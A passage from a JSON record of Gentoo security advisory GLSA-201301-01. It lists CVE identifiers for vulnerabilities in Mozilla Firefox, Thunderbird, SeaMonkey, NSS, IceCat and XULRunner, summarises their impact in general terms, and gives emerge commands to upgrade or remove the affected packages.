"CVE-2008-3837", "CVE-2009-0357", "CVE-2008-5021", "CVE-2008-5017", "CVE-2012-3966", "CVE-2012-5839", "CVE-2011-2378", "CVE-2009-1308", "CVE-2010-3775", "CVE-2009-2467", "CVE-2012-1961", "CVE-2010-5074", "CVE-2011-2996", "CVE-2010-3173", "CVE-2012-4216", "CVE-2008-4062", "CVE-2010-3179", "CVE-2010-0182", "CVE-2012-3967", "CVE-2011-3651", "CVE-2008-4060", "CVE-2010-0181", "CVE-2012-1951", "CVE-2012-0475", "CVE-2012-3965", "CVE-2012-1952", "CVE-2010-1201", "CVE-2011-4688", "CVE-2009-1306", "CVE-2010-1585", "CVE-2009-2479", "CVE-2012-3959", "CVE-2012-0455", "CVE-2009-0777", "CVE-2010-2755", "CVE-2011-0084", "CVE-2011-0051", "CVE-2010-3767", "CVE-2012-1939", "CVE-2009-1834", "CVE-2010-3771", "CVE-2010-0183", "CVE-2012-0474", "CVE-2012-3975", "CVE-2010-2768", "CVE-2008-5014", "CVE-2008-0367", "CVE-2008-4058", "CVE-2011-3002", "CVE-2012-4184", "CVE-2011-0057", "CVE-2012-0447", "CVE-2011-3232", "CVE-2008-5913", "CVE-2007-3073", "CVE-2012-4205", "CVE-2010-2751", "CVE-2009-1836", "CVE-2011-0069", "CVE-2008-5022", "CVE-2008-5512", "CVE-2012-3992", "CVE-2009-3374", "CVE-2008-5501", "CVE-2008-4068", "CVE-2008-5016", "CVE-2011-3004", "CVE-2012-3980", "CVE-2008-5503", "CVE-2011-2374", "CVE-2012-1955", "CVE-2009-1839", "CVE-2012-1960", "CVE-2012-0445", "CVE-2009-3074", "CVE-2012-1965", "CVE-2011-3670", "CVE-2012-0462", "CVE-2010-1028", "CVE-2010-0162", "CVE-2011-2377", "CVE-2009-2463", "CVE-2009-2061", "CVE-2009-3070", "CVE-2012-3977", "CVE-2011-3000", "CVE-2010-2765", "CVE-2009-3069", "CVE-2010-0171", "CVE-2010-2767", "CVE-2009-0353", "CVE-2011-0078", "CVE-2012-3960", "CVE-2010-3175", "CVE-2009-0775", "CVE-2012-0451", "CVE-2011-3655", "CVE-2012-4180", "CVE-2009-2044", "CVE-2010-3182", "CVE-2009-0776", "CVE-2009-3371", "CVE-2009-3377", "CVE-2012-1959", "CVE-2011-2363", "CVE-2009-3075", "CVE-2010-0163", "CVE-2010-1208", "CVE-2011-0070", "CVE-2012-1947", "CVE-2009-1841", "CVE-2010-3170", "CVE-2011-3005", "CVE-2011-0059", "CVE-2012-1971", "CVE-2009-3983", "CVE-2012-4208", 
"CVE-2009-3987", "CVE-2011-3658", "CVE-2011-2373", "CVE-2008-5511", "CVE-2012-1957", "CVE-2012-1958", "CVE-2011-0054", "CVE-2012-4190", "CVE-2008-4064", "CVE-2012-1976", "CVE-2011-1187", "CVE-2012-5835", "CVE-2010-3183", "CVE-2009-2654", "CVE-2010-1202", "CVE-2012-0468", "CVE-2009-3982", "CVE-2009-3985", "CVE-2009-2065", "CVE-2009-1313", "CVE-2009-3382", "CVE-2008-5508", "CVE-2012-3972", "CVE-2012-4207", "CVE-2011-2988", "CVE-2010-3770", "CVE-2008-4061", "CVE-2010-1199", "CVE-2012-4204", "CVE-2008-0017", "CVE-2009-3988", "CVE-2010-3400", "CVE-2009-1302", "CVE-2011-2985", "CVE-2009-2466", "CVE-2012-4192", "CVE-2011-0058", "CVE-2011-2987", "CVE-2012-4188", "CVE-2012-0441", "CVE-2008-5024", "CVE-2011-0076", "CVE-2007-2437", "CVE-2012-5833", "CVE-2011-2999", "CVE-2012-3964", "CVE-2012-5841", "CVE-2010-0179", "CVE-2010-1209", "CVE-2010-2754", "CVE-2008-5507", "CVE-2009-2471", "CVE-2012-3990", "CVE-2011-2375", "CVE-2010-1198", "CVE-2008-4065", "CVE-2009-1840", "CVE-2011-3665", "CVE-2009-3381", "CVE-2011-0067", "CVE-2010-2760", "CVE-2012-1937", "CVE-2012-4215", "CVE-2009-2043", "CVE-2009-1307", "CVE-2009-2664", "CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "description": "### Background\n\nMozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. 
The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the \u2018Mozilla Application Suite\u2019. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications such as Firefox and Thunderbird. NSS is Mozilla\u2019s Network Security Services library that implements PKI support. IceCat is the GNU version of Firefox. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition. Furthermore, a remote attacker may be able to perform Man-in-the-Middle attacks, obtain sensitive information, bypass restrictions and protection mechanisms, force file downloads, conduct XML injection attacks, conduct XSS attacks, bypass the Same Origin Policy, spoof URLs for phishing attacks, trigger a vertical scroll, spoof the location bar, spoof an SSL indicator, modify the browser\u2019s font, conduct clickjacking attacks, or have other unspecified impact. \n\nA local attacker could gain escalated privileges, obtain sensitive information, or replace an arbitrary downloaded file. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Mozilla Firefox users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nAll users of the Mozilla Firefox binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nAll Mozilla Thunderbird users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nAll users of the Mozilla Thunderbird binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nAll Mozilla SeaMonkey users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-2.14-r1\"\n \n\nAll users of the Mozilla SeaMonkey binary package should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/seamonkey-bin-2.14\"\n \n\nAll NSS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/nss-3.14\"\n \n\nThe \u201cwww-client/mozilla-firefox\u201d package has been merged into the \u201cwww-client/firefox\u201d package. To upgrade, please unmerge \u201cwww-client/mozilla-firefox\u201d and then emerge the latest \u201cwww-client/firefox\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-10.0.11\"\n \n\nThe \u201cwww-client/mozilla-firefox-bin\u201d package has been merged into the \u201cwww-client/firefox-bin\u201d package. 
To upgrade, please unmerge \u201cwww-client/mozilla-firefox-bin\u201d and then emerge the latest \u201cwww-client/firefox-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"www-client/mozilla-firefox-bin\"\n # emerge --ask --oneshot --verbose \">=www-client/firefox-bin-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird\u201d package has been merged into the \u201cmail-client/thunderbird\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird\u201d and then emerge the latest \u201cmail-client/thunderbird\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird\"\n # emerge --ask --oneshot --verbose \">=mail-client/thunderbird-10.0.11\"\n \n\nThe \u201cmail-client/mozilla-thunderbird-bin\u201d package has been merged into the \u201cmail-client/thunderbird-bin\u201d package. To upgrade, please unmerge \u201cmail-client/mozilla-thunderbird-bin\u201d and then emerge the latest \u201cmail-client/thunderbird-bin\u201d package: \n \n \n # emerge --sync\n # emerge --unmerge \"mail-client/mozilla-thunderbird-bin\"\n # emerge --ask --oneshot --verbose\n \">=mail-client/thunderbird-bin-10.0.11\"\n \n\nGentoo discontinued support for GNU IceCat. We recommend that users unmerge GNU IceCat: \n \n \n # emerge --unmerge \"www-client/icecat\"\n \n\nGentoo discontinued support for XULRunner. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner\"\n \n\nGentoo discontinued support for the XULRunner binary package. We recommend that users unmerge XULRunner: \n \n \n # emerge --unmerge \"net-libs/xulrunner-bin\"", "edition": 1, "modified": "2013-01-08T00:00:00", "published": "2013-01-08T00:00:00", "id": "GLSA-201301-01", "href": "https://security.gentoo.org/glsa/201301-01", "type": "gentoo", "title": "Mozilla Products: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}